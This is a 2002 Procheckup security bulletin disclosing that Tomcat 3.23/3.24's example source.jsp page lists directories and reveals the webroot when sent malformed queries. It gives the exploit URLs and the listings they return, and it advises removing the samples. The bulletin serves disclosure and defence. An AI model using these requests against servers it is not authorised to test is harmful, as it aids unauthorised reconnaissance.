Vulnerability in Apache Tomcat v3.23 & v3.24

[<webmaster@procheckup.com>]

Procheckup Ltd
www.procheckup.com    

Procheckup Security Bulletin PR02-05

	   
  Description: Tomcat source.jsp directory listing and 
webroot location display
         Date: 8/1/2002

  Application: Apache Tomcat Java server versions 3.23 and 
3.24
     Platform: Linux/Unix
     Severity: Remote attackers can obtain listings of web 
directories and sometines the location of webroot
      Authors: Richard Brain [richard.brain@procheckup.com]
Vendor Status:
CVE Candidate: Not assigned
    Reference: www.procheckup.com/security_info/vuln.html


 Description:

Tomcat is the free opensource  Java server, 
http://jakarta.apache.org/tomcat/.

Normally source.jsp is used to look at the source code of 
programs within the examples directories.  A typical 
request is 
http://webserver:80/examples/jsp/source.jsp?/jsp/num/numgues
s.jsp.
We have found by using source.jsp with a malformed input a 
directory listing is displayed and the location of the 
webroot is sometimes disclosed.

The vulnerabilities may only work on port 8080 rather than 
port 80, dependant on how the webserver has been configured 
with Tomcat.

Exploits

A) Requesting the following url :-

http://webserver:80/examples/jsp/source.jsp??

Gives the directory listing and webroot on 3.23, 3.24 just 
gives a directory listing.

<title>Directory Listing</title>
<base 
href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WE
BROOT"/webapps/examples</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" 
width=32 height=32>
<a href="images">images</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsp">jsp</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="META-INF">META-INF</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="servlets">servlets</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="WEB-INF">WEB-INF</a><br>

B) Requesting the following url :-

http://webserver:80/examples/jsp/source.jsp?/jsp/

Gives the directory listing and webroot on 3.23, 3.24 just 
gives a directory listing on a subdirectory.
<title>Directory Listing</title>
<base 
href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>
/"WEBROOT"/webapps/examples/jsp</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" 
width=32 height=32>
<a href="cal">cal</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="checkbox">checkbox</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="colors">colors</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="dates">dates</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="error">error</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="forward">forward</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="include">include</a><br><img align=middle 
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="index.html">index.html</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsptoserv">jsptoserv</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="num">num</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="plugin">plugin</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="security">security</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="sessions">sessions</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="simpletag">simpletag</a><br><img align=middle 
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="snp">snp</a><br><img align=middle 
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="source.jsp">source.jsp</a><br>

   Solution:
  Delete the samples directory if not needed.

      Legal:

  Copyright 2002 Procheckup Ltd. All rights reserved.


  Permission is granted for copying and circulating this 
Bulletin
  to the Internet community for the purpose of alerting 
them to problems
  , if and only if, the Bulletin is not edited or changed 
in any way, 
  is attributed to Procheckup, and provided such 
reproduction and/or
  distribution is performed for non-commercial purposes.


  Any other use of this information is prohibited. 
Procheckup is not
  liable for any misuse of this information by any third 
party.